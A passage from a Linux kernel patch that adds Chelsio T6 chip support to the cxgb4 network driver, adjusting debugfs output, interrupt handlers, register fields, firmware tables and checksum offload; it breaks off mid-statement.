a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_debugfs.c @@ -1084,41 +1084,89 @@ static inline void tcamxy2valmask(u64 x, u64 y, u8 *addr, u64 *mask) static int mps_tcam_show(struct seq_file *seq, void *v) { - if (v == SEQ_START_TOKEN) - seq_puts(seq, "Idx Ethernet address Mask Vld Ports PF" - " VF Replication " - "P0 P1 P2 P3 ML\n"); - else { + struct adapter *adap = seq->private; + unsigned int chip_ver = CHELSIO_CHIP_VERSION(adap->params.chip); + + if (v == SEQ_START_TOKEN) { + if (adap->params.arch.mps_rplc_size > 128) + seq_puts(seq, "Idx Ethernet address Mask " + "Vld Ports PF VF " + "Replication " + " P0 P1 P2 P3 ML\n"); + else + seq_puts(seq, "Idx Ethernet address Mask " + "Vld Ports PF VF Replication" + " P0 P1 P2 P3 ML\n"); + } else { u64 mask; u8 addr[ETH_ALEN]; - struct adapter *adap = seq->private; + bool replicate; unsigned int idx = (uintptr_t)v - 2; - u64 tcamy = t4_read_reg64(adap, MPS_CLS_TCAM_Y_L(idx)); - u64 tcamx = t4_read_reg64(adap, MPS_CLS_TCAM_X_L(idx)); - u32 cls_lo = t4_read_reg(adap, MPS_CLS_SRAM_L(idx)); - u32 cls_hi = t4_read_reg(adap, MPS_CLS_SRAM_H(idx)); - u32 rplc[4] = {0, 0, 0, 0}; + u64 tcamy, tcamx, val; + u32 cls_lo, cls_hi, ctl; + u32 rplc[8] = {0}; + + if (chip_ver > CHELSIO_T5) { + /* CtlCmdType - 0: Read, 1: Write + * CtlTcamSel - 0: TCAM0, 1: TCAM1 + * CtlXYBitSel- 0: Y bit, 1: X bit + */ + + /* Read tcamy */ + ctl = CTLCMDTYPE_V(0) | CTLXYBITSEL_V(0); + if (idx < 256) + ctl |= CTLTCAMINDEX_V(idx) | CTLTCAMSEL_V(0); + else + ctl |= CTLTCAMINDEX_V(idx - 256) | + CTLTCAMSEL_V(1); + t4_write_reg(adap, MPS_CLS_TCAM_DATA2_CTL_A, ctl); + val = t4_read_reg(adap, MPS_CLS_TCAM_DATA1_A); + tcamy = DMACH_G(val) << 32; + tcamy |= t4_read_reg(adap, MPS_CLS_TCAM_DATA0_A); + + /* Read tcamx. Change the control param */ + ctl |= CTLXYBITSEL_V(1); + t4_write_reg(adap, MPS_CLS_TCAM_DATA2_CTL_A, ctl); + val = t4_read_reg(adap, MPS_CLS_TCAM_DATA1_A); + tcamx = DMACH_G(val) << 32; + tcamx |= t4_read_reg(adap, MPS_CLS_TCAM_DATA0_A); + } else { + tcamy = t4_read_reg64(adap, MPS_CLS_TCAM_Y_L(idx)); + tcamx = t4_read_reg64(adap, MPS_CLS_TCAM_X_L(idx)); + } + + cls_lo = t4_read_reg(adap, MPS_CLS_SRAM_L(idx)); + cls_hi = t4_read_reg(adap, MPS_CLS_SRAM_H(idx)); if (tcamx & tcamy) { seq_printf(seq, "%3u -\n", idx); goto out; } - if (cls_lo & REPLICATE_F) { + rplc[0] = rplc[1] = rplc[2] = rplc[3] = 0; + if (chip_ver > CHELSIO_T5) + replicate = (cls_lo & T6_REPLICATE_F); + else + replicate = (cls_lo & REPLICATE_F); + + if (replicate) { struct fw_ldst_cmd ldst_cmd; int ret; + struct fw_ldst_mps_rplc mps_rplc; + u32 ldst_addrspc; memset(&ldst_cmd, 0, sizeof(ldst_cmd)); + ldst_addrspc = + FW_LDST_CMD_ADDRSPACE_V(FW_LDST_ADDRSPC_MPS); ldst_cmd.op_to_addrspace = htonl(FW_CMD_OP_V(FW_LDST_CMD) | FW_CMD_REQUEST_F | FW_CMD_READ_F | - FW_LDST_CMD_ADDRSPACE_V( - FW_LDST_ADDRSPC_MPS)); + ldst_addrspc); ldst_cmd.cycles_to_len16 = htonl(FW_LEN16(ldst_cmd)); - ldst_cmd.u.mps.fid_ctl = + ldst_cmd.u.mps.rplc.fid_idx = htons(FW_LDST_CMD_FID_V(FW_LDST_MPS_RPLC) | - FW_LDST_CMD_CTL_V(idx)); + FW_LDST_CMD_IDX_V(idx)); ret = t4_wr_mbox(adap, adap->mbox, &ldst_cmd, sizeof(ldst_cmd), &ldst_cmd); if (ret) @@ -1126,30 +1174,69 @@ static int mps_tcam_show(struct seq_file *seq, void *v) "replication map for idx %d: %d\n", idx, -ret); else { - rplc[0] = ntohl(ldst_cmd.u.mps.rplc31_0); - rplc[1] = ntohl(ldst_cmd.u.mps.rplc63_32); - rplc[2] = ntohl(ldst_cmd.u.mps.rplc95_64); - rplc[3] = ntohl(ldst_cmd.u.mps.rplc127_96); + mps_rplc = ldst_cmd.u.mps.rplc; + rplc[0] = ntohl(mps_rplc.rplc31_0); + rplc[1] = ntohl(mps_rplc.rplc63_32); + rplc[2] = ntohl(mps_rplc.rplc95_64); + rplc[3] = ntohl(mps_rplc.rplc127_96); + if (adap->params.arch.mps_rplc_size > 128) { + rplc[4] = ntohl(mps_rplc.rplc159_128); + rplc[5] = ntohl(mps_rplc.rplc191_160); + rplc[6] = ntohl(mps_rplc.rplc223_192); + rplc[7] = ntohl(mps_rplc.rplc255_224); + } } } tcamxy2valmask(tcamx, tcamy, addr, &mask); - seq_printf(seq, "%3u %02x:%02x:%02x:%02x:%02x:%02x %012llx" - "%3c %#x%4u%4d", - idx, addr[0], addr[1], addr[2], addr[3], addr[4], - addr[5], (unsigned long long)mask, - (cls_lo & SRAM_VLD_F) ? 'Y' : 'N', PORTMAP_G(cls_hi), - PF_G(cls_lo), - (cls_lo & VF_VALID_F) ? VF_G(cls_lo) : -1); - if (cls_lo & REPLICATE_F) - seq_printf(seq, " %08x %08x %08x %08x", - rplc[3], rplc[2], rplc[1], rplc[0]); + if (chip_ver > CHELSIO_T5) + seq_printf(seq, "%3u %02x:%02x:%02x:%02x:%02x:%02x " + "%012llx%3c %#x%4u%4d", + idx, addr[0], addr[1], addr[2], addr[3], + addr[4], addr[5], (unsigned long long)mask, + (cls_lo & T6_SRAM_VLD_F) ? 'Y' : 'N', + PORTMAP_G(cls_hi), + T6_PF_G(cls_lo), + (cls_lo & T6_VF_VALID_F) ? + T6_VF_G(cls_lo) : -1); else - seq_printf(seq, "%36c", ' '); - seq_printf(seq, "%4u%3u%3u%3u %#x\n", - SRAM_PRIO0_G(cls_lo), SRAM_PRIO1_G(cls_lo), - SRAM_PRIO2_G(cls_lo), SRAM_PRIO3_G(cls_lo), - (cls_lo >> MULTILISTEN0_S) & 0xf); + seq_printf(seq, "%3u %02x:%02x:%02x:%02x:%02x:%02x " + "%012llx%3c %#x%4u%4d", + idx, addr[0], addr[1], addr[2], addr[3], + addr[4], addr[5], (unsigned long long)mask, + (cls_lo & SRAM_VLD_F) ? 'Y' : 'N', + PORTMAP_G(cls_hi), + PF_G(cls_lo), + (cls_lo & VF_VALID_F) ? VF_G(cls_lo) : -1); + + if (replicate) { + if (adap->params.arch.mps_rplc_size > 128) + seq_printf(seq, " %08x %08x %08x %08x " + "%08x %08x %08x %08x", + rplc[7], rplc[6], rplc[5], rplc[4], + rplc[3], rplc[2], rplc[1], rplc[0]); + else + seq_printf(seq, " %08x %08x %08x %08x", + rplc[3], rplc[2], rplc[1], rplc[0]); + } else { + if (adap->params.arch.mps_rplc_size > 128) + seq_printf(seq, "%72c", ' '); + else + seq_printf(seq, "%36c", ' '); + } + + if (chip_ver > CHELSIO_T5) + seq_printf(seq, "%4u%3u%3u%3u %#x\n", + T6_SRAM_PRIO0_G(cls_lo), + T6_SRAM_PRIO1_G(cls_lo), + T6_SRAM_PRIO2_G(cls_lo), + T6_SRAM_PRIO3_G(cls_lo), + (cls_lo >> T6_MULTILISTEN0_S) & 0xf); + else + seq_printf(seq, "%4u%3u%3u%3u %#x\n", + SRAM_PRIO0_G(cls_lo), SRAM_PRIO1_G(cls_lo), + SRAM_PRIO2_G(cls_lo), SRAM_PRIO3_G(cls_lo), + (cls_lo >> MULTILISTEN0_S) & 0xf); } out: return 0; } @@ -1416,6 +1503,9 @@ static int rss_config_show(struct seq_file *seq, void *v) seq_printf(seq, " HashDelay: %3d\n", HASHDELAY_G(rssconf)); if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) seq_printf(seq, " VfWrAddr: %3d\n", VFWRADDR_G(rssconf)); + else + seq_printf(seq, " VfWrAddr: %3d\n", + T6_VFWRADDR_G(rssconf)); seq_printf(seq, " KeyMode: %s\n", keymode[KEYMODE_G(rssconf)]); seq_printf(seq, " VfWrEn: %3s\n", yesno(rssconf & VFWREN_F)); seq_printf(seq, " KeyWrEn: %3s\n", yesno(rssconf & KEYWREN_F)); @@ -1634,14 +1724,14 @@ static int rss_vf_config_open(struct inode *inode, struct file *file) struct adapter *adapter = inode->i_private; struct seq_tab *p; struct rss_vf_conf *vfconf; - int vf; + int vf, vfcount = adapter->params.arch.vfcount; - p = seq_open_tab(file, 128, sizeof(*vfconf), 1, rss_vf_config_show); + p = seq_open_tab(file, vfcount, sizeof(*vfconf), 1, rss_vf_config_show); if (!p) return -ENOMEM; vfconf = (struct rss_vf_conf *)p->data; - for (vf = 0; vf < 128; vf++) { + for (vf = 0; vf < vfcount; vf++) { t4_read_rss_vf_config(adapter, vf, &vfconf[vf].rss_vf_vfl, &vfconf[vf].rss_vf_vfh); } @@ -2033,7 +2123,7 @@ void add_debugfs_files(struct adapter *adap, int t4_setup_debugfs(struct adapter *adap) { int i; - u32 size; + u32 size = 0; struct dentry *de; static struct t4_debugfs_entry t4_debugfs_files[] = { @@ -2104,12 +2194,7 @@ int t4_setup_debugfs(struct adapter *adap) size = t4_read_reg(adap, MA_EDRAM1_BAR_A); add_debugfs_mem(adap, "edc1", MEM_EDC1, EDRAM1_SIZE_G(size)); } - if (is_t4(adap->params.chip)) { - size = t4_read_reg(adap, MA_EXT_MEMORY_BAR_A); - if (i & EXT_MEM_ENABLE_F) - add_debugfs_mem(adap, "mc", MEM_MC, - EXT_MEM_SIZE_G(size)); - } else { + if (is_t5(adap->params.chip)) { if (i & EXT_MEM0_ENABLE_F) { size = t4_read_reg(adap, MA_EXT_MEMORY0_BAR_A); add_debugfs_mem(adap, "mc0", MEM_MC0, @@ -2120,6 +2205,11 @@ int t4_setup_debugfs(struct adapter *adap) add_debugfs_mem(adap, "mc1", MEM_MC1, EXT_MEM1_SIZE_G(size)); } + } else { + if (i & EXT_MEM_ENABLE_F) + size = t4_read_reg(adap, MA_EXT_MEMORY_BAR_A); + add_debugfs_mem(adap, "mc", MEM_MC, + EXT_MEM_SIZE_G(size)); } de = debugfs_create_file_size("flash", S_IRUSR, adap->debugfs_root, adap, diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c index 974b27ce6a70..a589591e5b63 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4_main.c @@ -135,8 +135,10 @@ struct filter_entry { #define FW4_FNAME "cxgb4/t4fw.bin" #define FW5_FNAME "cxgb4/t5fw.bin" +#define FW6_FNAME "cxgb4/t6fw.bin" #define FW4_CFNAME "cxgb4/t4-config.txt" #define FW5_CFNAME "cxgb4/t5-config.txt" +#define FW6_CFNAME "cxgb4/t6-config.txt" #define PHY_AQ1202_FIRMWARE "cxgb4/aq1202_fw.cld" #define PHY_BCM84834_FIRMWARE "cxgb4/bcm8483.bin" #define PHY_AQ1202_DEVICEID 0x4409 @@ -1721,7 +1723,7 @@ static int tid_init(struct tid_info *t) bitmap_zero(t->stid_bmap, t->nstids + t->nsftids); /* Reserve stid 0 for T4/T5 adapters */ if (!t->stid_base && - (is_t4(adap->params.chip) || is_t5(adap->params.chip))) + (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5)) __set_bit(0, t->stid_bmap); return 0; @@ -2108,10 +2110,7 @@ int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte) if (offset < mc0_end) { memtype = MEM_MC0; memaddr = offset - edc1_end; - } else if (is_t4(adap->params.chip)) { - /* T4 only has a single memory channel */ - goto err; - } else { + } else if (is_t5(adap->params.chip)) { size = t4_read_reg(adap, MA_EXT_MEMORY1_BAR_A); mc1_size = EXT_MEM1_SIZE_G(size) << 20; mc1_end = mc0_end + mc1_size; @@ -2122,6 +2121,9 @@ int cxgb4_read_tpte(struct net_device *dev, u32 stag, __be32 *tpte) /* offset beyond the end of any memory */ goto err; } + } else { + /* T4/T6 only has a single memory channel */ + goto err; } } @@ -2286,9 +2288,13 @@ static void process_db_full(struct work_struct *work) drain_db_fifo(adap, dbfifo_drain_delay); enable_dbs(adap); notify_rdma_uld(adap, CXGB4_CONTROL_DB_EMPTY); - t4_set_reg_field(adap, SGE_INT_ENABLE3_A, - DBFIFO_HP_INT_F | DBFIFO_LP_INT_F, - DBFIFO_HP_INT_F | DBFIFO_LP_INT_F); + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + t4_set_reg_field(adap, SGE_INT_ENABLE3_A, + DBFIFO_HP_INT_F | DBFIFO_LP_INT_F, + DBFIFO_HP_INT_F | DBFIFO_LP_INT_F); + else + t4_set_reg_field(adap, SGE_INT_ENABLE3_A, + DBFIFO_LP_INT_F, DBFIFO_LP_INT_F); } static void sync_txq_pidx(struct adapter *adap, struct sge_txq *q) @@ -2350,7 +2356,7 @@ static void process_db_drop(struct work_struct *work) drain_db_fifo(adap, dbfifo_drain_delay); enable_dbs(adap); notify_rdma_uld(adap, CXGB4_CONTROL_DB_EMPTY); - } else { + } else if (is_t5(adap->params.chip)) { u32 dropped_db = t4_read_reg(adap, 0x010ac); u16 qid = (dropped_db >> 15) & 0x1ffff; u16 pidx_inc = dropped_db & 0x1fff; @@ -2371,7 +2377,8 @@ static void process_db_drop(struct work_struct *work) t4_set_reg_field(adap, 0x10b0, 1<<15, 1<<15); } - t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, DROPPED_DB_F, 0); + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + t4_set_reg_field(adap, SGE_DOORBELL_CONTROL_A, DROPPED_DB_F, 0); } void t4_db_full(struct adapter *adap) @@ -3390,6 +3397,9 @@ static int adap_init0_config(struct adapter *adapter, int reset) case CHELSIO_T5: fw_config_file = FW5_CFNAME; break; + case CHELSIO_T6: + fw_config_file = FW6_CFNAME; + break; default: dev_err(adapter->pdev_dev, "Device %d is not supported\n", adapter->pdev->device); @@ -3586,7 +3596,24 @@ static struct fw_info fw_info_array[] = { .intfver_iscsi = FW_INTFVER(T5, ISCSI), .intfver_fcoe = FW_INTFVER(T5, FCOE), }, + }, { + .chip = CHELSIO_T6, + .fs_name = FW6_CFNAME, + .fw_mod_name = FW6_FNAME, + .fw_hdr = { + .chip = FW_HDR_CHIP_T6, + .fw_ver = __cpu_to_be32(FW_VERSION(T6)), + .intfver_nic = FW_INTFVER(T6, NIC), + .intfver_vnic = FW_INTFVER(T6, VNIC), + .intfver_ofld = FW_INTFVER(T6, OFLD), + .intfver_ri = FW_INTFVER(T6, RI), + .intfver_iscsipdu = FW_INTFVER(T6, ISCSIPDU), + .intfver_iscsi = FW_INTFVER(T6, ISCSI), + .intfver_fcoepdu = FW_INTFVER(T6, FCOEPDU), + .intfver_fcoe = FW_INTFVER(T6, FCOE), + }, } + }; static struct fw_info *find_fw_info(int chip) diff --git a/drivers/net/ethernet/chelsio/cxgb4/sge.c b/drivers/net/ethernet/chelsio/cxgb4/sge.c index f9c889e14634..6b7c37fd0252 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/sge.c +++ b/drivers/net/ethernet/chelsio/cxgb4/sge.c @@ -522,14 +522,13 @@ static void unmap_rx_buf(struct adapter *adap, struct sge_fl *q) static inline void ring_fl_db(struct adapter *adap, struct sge_fl *q) { - u32 val; if (q->pend_cred >= 8) { + u32 val = adap->params.arch.sge_fl_db; + if (is_t4(adap->params.chip)) - val = PIDX_V(q->pend_cred / 8); + val |= PIDX_V(q->pend_cred / 8); else - val = PIDX_T5_V(q->pend_cred / 8) | - DBTYPE_F; - val |= DBPRIO_F; + val |= PIDX_T5_V(q->pend_cred / 8); /* Make sure all memory writes to the Free List queue are * committed before we tell the hardware about them. @@ -1034,7 +1033,7 @@ static void inline_tx_skb(const struct sk_buff *skb, const struct sge_txq *q, * Figure out what HW csum a packet wants and return the appropriate control * bits. */ -static u64 hwcsum(const struct sk_buff *skb) +static u64 hwcsum(enum chip_type chip, const struct sk_buff *skb) { int csum_type; const struct iphdr *iph = ip_hdr(skb); @@ -1065,11 +1064,16 @@ static u64 hwcsum(const struct sk_buff *skb) goto nocsum; } - if (likely(csum_type >= TX_CSUM_TCPIP)) - return TXPKT_CSUM_TYPE_V(csum_type) | - TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)) | - TXPKT_ETHHDR_LEN_V(skb_network_offset(skb) - ETH_HLEN); - else { + if (likely(csum_type >= TX_CSUM_TCPIP)) { + u64 hdr_len = TXPKT_IPHDR_LEN_V(skb_network_header_len(skb)); + int eth_hdr_len = skb_network_offset(skb) - ETH_HLEN; + + if (CHELSIO_CHIP_VERSION(chip) <= CHELSIO_T5) + hdr_len |= TXPKT_ETHHDR_LEN_V(eth_hdr_len); + else + hdr_len |= T6_TXPKT_ETHHDR_LEN_V(eth_hdr_len); + return TXPKT_CSUM_TYPE_V(csum_type) | hdr_len; + } else { int start = skb_transport_offset(skb); return TXPKT_CSUM_TYPE_V(csum_type) | @@ -1237,9 +1241,15 @@ out_free: dev_kfree_skb_any(skb); else lso->c.len = htonl(LSO_T5_XFER_SIZE_V(skb->len)); cpl = (void *)(lso + 1); - cntrl = TXPKT_CSUM_TYPE_V(v6 ? TX_CSUM_TCPIP6 : TX_CSUM_TCPIP) | - TXPKT_IPHDR_LEN_V(l3hdr_len) | - TXPKT_ETHHDR_LEN_V(eth_xtra_len); + + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + cntrl = TXPKT_ETHHDR_LEN_V(eth_xtra_len); + else + cntrl = T6_TXPKT_ETHHDR_LEN_V(eth_xtra_len); + + cntrl |= TXPKT_CSUM_TYPE_V(v6 ? + TX_CSUM_TCPIP6 : TX_CSUM_TCPIP) | + TXPKT_IPHDR_LEN_V(l3hdr_len); q->tso++; q->tx_cso += ssi->gso_segs; } else { @@ -1248,7 +1258,8 @@ out_free: dev_kfree_skb_any(skb); FW_WR_IMMDLEN_V(len)); cpl = (void *)(wr + 1); if (skb->ip_summed == CHECKSUM_PARTIAL) { - cntrl = hwcsum(skb) | TXPKT_IPCSUM_DIS_F; + cntrl = hwcsum(adap->params.chip, skb) | + TXPKT_IPCSUM_DIS_F; q->tx_cso++; } } @@ -2440,6 +2451,8 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, c.iqns_to_fl0congen = htonl(FW_IQ_CMD_IQFLINTCONGEN_F); if (fl) { + enum chip_type chip = CHELSIO_CHIP_VERSION(adap->params.chip); + /* Allocate the ring for the hardware free list (with space * for its status page) along with the associated software * descriptor ring. The free list size needs to be a multiple @@ -2468,7 +2481,9 @@ int t4_sge_alloc_rxq(struct adapter *adap, struct sge_rspq *iq, bool fwevtq, FW_IQ_CMD_FL0CONGEN_F); c.fl0dcaen_to_fl0cidxfthresh = htons(FW_IQ_CMD_FL0FBMIN_V(FETCHBURSTMIN_64B_X) | - FW_IQ_CMD_FL0FBMAX_V(FETCHBURSTMAX_512B_X)); + FW_IQ_CMD_FL0FBMAX_V((chip <= CHELSIO_T5) ? + FETCHBURSTMAX_512B_X : + FETCHBURSTMAX_256B_X)); c.fl0size = htons(flsz); c.fl0addr = cpu_to_be64(fl->addr); } diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index e9ccfeb4ec03..35a44db29347 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -150,7 +150,12 @@ void t4_write_indirect(struct adapter *adap, unsigned int addr_reg, */ void t4_hw_pci_read_cfg4(struct adapter *adap, int reg, u32 *val) { - u32 req = ENABLE_F | FUNCTION_V(adap->pf) | REGISTER_V(reg); + u32 req = FUNCTION_V(adap->pf) | REGISTER_V(reg); + + if (CHELSIO_CHIP_VERSION(adap->params.chip) <= CHELSIO_T5) + req |= ENABLE_F; + else + req |= T6_ENABLE_F; if (is_t4(adap->params.chip)) req |= LOCALCFG_F; @@ -381,9 +386,8 @@ int t4_memory_rw(struct adapter *adap, int win, int mtype, u32 addr, /* Offset into the region of memory which is being accessed * MEM_EDC0 = 0 * MEM_EDC1 = 1 - * MEM_MC = 2 -- T4 - * MEM_MC0 = 2 -- For T5 - * MEM_MC1 = 3 -- For T5 + * MEM_MC = 2 -- MEM_MC for chips with only 1 memory controller + * MEM_MC1 = 3 -- for chips with 2 memory controllers (e.g. T5) */ edc_size = EDRAM0_SIZE_G(t4_read_reg(adap, MA_EDRAM0_BAR_A)); if (mtype != MEM_MC1) @@ -2292,7 +2296,8 @@ static bool t4_fw_matches_chip(const struct adapter *adap, * which will keep us "honest" in the future ... */ if ((is_t4(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T4) || - (is_t5(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T5)) + (is_t5(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T5) || + (is_t6(adap->params.chip) && hdr->chip == FW_HDR_CHIP_T6)) return true; dev_err(adap->pdev_dev, @@ -2832,6 +2837,7 @@ static void tp_intr_handler(struct adapter *adapter) static void sge_intr_handler(struct adapter *adapter) { u64 v; + u32 err; static const struct intr_info sge_intr_info[] = { { ERR_CPL_EXCEED_IQE_SIZE_F, @@ -2840,8 +2846,6 @@ static void sge_intr_handler(struct adapter *adapter) "SGE GTS CIDX increment too large", -1, 0 }, { ERR_CPL_OPCODE_0_F, "SGE received 0-length CPL", -1, 0 }, { DBFIFO_LP_INT_F, NULL, -1, 0, t4_db_full }, - { DBFIFO_HP_INT_F, NULL, -1, 0, t4_db_full }, - { ERR_DROPPED_DB_F, NULL, -1, 0, t4_db_dropped }, { ERR_DATA_CPL_ON_HIGH_QID1_F | ERR_DATA_CPL_ON_HIGH_QID0_F, "SGE IQID > 1023 received CPL for FL", -1, 0 }, { ERR_BAD_DB_PIDX3_F, "SGE DBP 3 pidx increment too large", -1, @@ -2854,13 +2858,19 @@ static void sge_intr_handler(struct adapter *adapter) 0 }, { ERR_ING_CTXT_PRIO_F, "SGE too many priority ingress contexts", -1, 0 }, - { ERR_EGR_CTXT_PRIO_F, - "SGE too many priority egress contexts", -1, 0 }, { INGRESS_SIZE_ERR_F, "SGE illegal ingress QID", -1, 0 }, { EGRESS_SIZE_ERR_F, "SGE illegal egress QID", -1, 0 }, { 0 } }; + static struct intr_info t4t5_sge_intr_info[] = { + { ERR_DROPPED_DB_F, NULL, -1, 0, t4_db_dropped }, + { DBFIFO_HP_INT_F, NULL, -1, 0, t4_db_full }, + { ERR_EGR_CTXT_PRIO_F, + "SGE too many priority egress contexts", -1, 0 }, + { 0 } + }; + v = (u64)t4_read_reg(adapter, SGE_INT_CAUSE1_A) | ((u64)t4_read_reg(adapter, SGE_INT_CAUSE2_A) << 32); if (v) { @@ -2870,8 +2880,23 @@ static void sge_intr_handler(struct adapter *adapter) t4_write_reg(adapter, SGE_INT_CAUSE2_A, v >> 32); } - if (t4_handle_intr_status(adapter, SGE_INT_CAUSE3_A, sge_intr_info) || - v != 0) + v |= t4_handle_intr_status(adapter, SGE_INT_CAUSE3_A, sge_intr_info); + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) + v |= t4_handle_intr_status(adapter, SGE_INT_CAUSE3_A, + t4t5_sge_intr_info); + + err = t4_read_reg(adapter, SGE_ERROR_STATS_A); + if (err & ERROR_QID_VALID_F) { + dev_err(adapter->pdev_dev, "SGE error for queue %u\n", + ERROR_QID_G(err)); + if (err & UNCAPTURED_ERROR_F) + dev_err(adapter->pdev_dev, + "SGE UNCAPTURED_ERROR set (clearing)\n"); + t4_write_reg(adapter, SGE_ERROR_STATS_A, ERROR_QID_VALID_F | + UNCAPTURED_ERROR_F); + } + + if (v != 0) t4_fatal_err(adapter); } @@ -3044,6 +3069,7 @@ static void cplsw_intr_handler(struct adapter *adapter) */ static void le_intr_handler(struct adapter *adap) { + enum chip_type chip = CHELSIO_CHIP_VERSION(adap->params.chip); static const struct intr_info le_intr_info[] = { { LIPMISS_F, "LE LIP miss", -1, 0 }, { LIP0_F, "LE 0 LIP error", -1, 0 }, @@ -3053,7 +3079,18 @@ static void le_intr_handler(struct adapter *adap) { 0 } }; - if (t4_handle_intr_status(adap, LE_DB_INT_CAUSE_A, le_intr_info)) + static struct intr_info t6_le_intr_info[] = { + { T6_LIPMISS_F, "LE LIP miss", -1, 0 }, + { T6_LIP0_F, "LE 0 LIP error", -1, 0 }, + { TCAMINTPERR_F, "LE parity error", -1, 1 }, + { T6_UNKNOWNCMD_F, "LE unknown command", -1, 1 }, + { SSRAMINTPERR_F, "LE request queue parity error", -1, 1 }, + { 0 } + }; + + if (t4_handle_intr_status(adap, LE_DB_INT_CAUSE_A, + (chip <= CHELSIO_T5) ? + le_intr_info : t6_le_intr_info)) t4_fatal_err(adap); } @@ -3322,7 +3359,7 @@ int t4_slow_intr_handler(struct adapter *adapter) pcie_intr_handler(adapter); if (cause & MC_F) mem_intr_handler(adapter, MEM_MC); - if (!is_t4(adapter->params.chip) && (cause & MC1_S)) + if (is_t5(adapter->params.chip) && (cause & MC1_F)) mem_intr_handler(adapter, MEM_MC1); if (cause & EDC0_F) mem_intr_handler(adapter, MEM_EDC0); @@ -3368,17 +3405,18 @@ int t4_slow_intr_handler(struct adapter *adapter) */ void t4_intr_enable(struct adapter *adapter) { + u32 val = 0; u32 pf = SOURCEPF_G(t4_read_reg(adapter, PL_WHOAMI_A)); + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) + val = ERR_DROPPED_DB_F | ERR_EGR_CTXT_PRIO_F | DBFIFO_HP_INT_F; t4_write_reg(adapter, SGE_INT_ENABLE3_A, ERR_CPL_EXCEED_IQE_SIZE_F | ERR_INVALID_CIDX_INC_F | ERR_CPL_OPCODE_0_F | - ERR_DROPPED_DB_F | ERR_DATA_CPL_ON_HIGH_QID1_F | + ERR_DATA_CPL_ON_HIGH_QID1_F | INGRESS_SIZE_ERR_F | ERR_DATA_CPL_ON_HIGH_QID0_F | ERR_BAD_DB_PIDX3_F | ERR_BAD_DB_PIDX2_F | ERR_BAD_DB_PIDX1_F | ERR_BAD_DB_PIDX0_F | ERR_ING_CTXT_PRIO_F | - ERR_EGR_CTXT_PRIO_F | INGRESS_SIZE_ERR_F | - DBFIFO_HP_INT_F | DBFIFO_LP_INT_F | - EGRESS_SIZE_ERR_F); + DBFIFO_LP_INT_F | EGRESS_SIZE_ERR_F | val); t4_write_reg(adapter, MYPF_REG(PL_PF_INT_ENABLE_A), PF_INTR_MASK); t4_set_reg_field(adapter, PL_INT_MAP0_A, 0, 1 << pf); } @@ -3592,11 +3630,29 @@ void t4_read_rss_key(struct adapter *adap, u32 *key) */ void t4_write_rss_key(struct adapter *adap, const u32 *key, int idx) { + u8 rss_key_addr_cnt = 16; + u32 vrt = t4_read_reg(adap, TP_RSS_CONFIG_VRT_A); + + /* T6 and later: for KeyMode 3 (per-vf and per-vf scramble), + * allows access to key addresses 16-63 by using KeyWrAddrX + * as index[5:4](upper 2) into key table + */ + if ((CHELSIO_CHIP_VERSION(adap->params.chip) > CHELSIO_T5) && + (vrt & KEYEXTEND_F) && (KEYMODE_G(vrt) == 3)) + rss_key_addr_cnt = 32; + t4_write_indirect(adap, TP_PIO_ADDR_A, TP_PIO_DATA_A, key, 10, TP_RSS_SECRET_KEY0_A); - if (idx >= 0 && idx < 16) - t4_write_reg(adap, TP_RSS_CONFIG_VRT_A, - KEYWRADDR_V(idx) | KEYWREN_F); + + if (idx >= 0 && idx < rss_key_addr_cnt) { + if (rss_key_addr_cnt > 16) + t4_write_reg(adap, TP_RSS_CONFIG_VRT_A, + KEYWRADDRX_V(idx >> 4) | + T6_VFWRADDR_V(idx) | KEYWREN_F); + else + t4_write_reg(adap, TP_RSS_CONFIG_VRT_A, + KEYWRADDR_V(idx) | KEYWREN_F); + } } /** @@ -3630,8 +3686,13 @@ void t4_read_rss_vf_config(struct adapter *adapter, unsigned int index, { u32 vrt, mask, data; - mask = VFWRADDR_V(VFWRADDR_M); - data = VFWRADDR_V(index); + if (CHELSIO_CHIP_VERSION(adapter->params.chip) <= CHELSIO_T5) { + mask = VFWRADDR_V(VFWRADDR_M); + data = VFWRADDR_V(index); + } else { + mask = T6_VFWRADDR_V(T6_VFWRADDR_M); + data = T6_VFWRADDR_V(index); + } /* Request that the index'th VF Table values be read into VFL/VFH. */ @@ -5142,45 +5203,71 @@ int t4_alloc_mac_filt(struct adapter *adap, unsigned int mbox, unsigned int viid, bool free, unsigned int naddr, const u8 **addr, u16 *idx, u64 *hash, bool sleep_ok) { - int i, ret; + int offset, ret = 0; struct fw_vi_mac_cmd c; - struct fw_vi_mac_exact *p; - unsigned int max_naddr = is_t4(adap->params.chip) ? - NUM_MPS_CLS_SRAM_L_INSTANCES : - NUM_MPS_T5_CLS_SRAM_L_INSTANCES; + unsigned int nfilters = 0; + unsigned int max_naddr = adap->params.arch.mps_tcam_size; + unsigned int rem = naddr; - if (naddr > 7) + if (naddr > max_naddr) return -EINVAL; - memset(&c, 0, sizeof(c)); - c.op_to_viid = 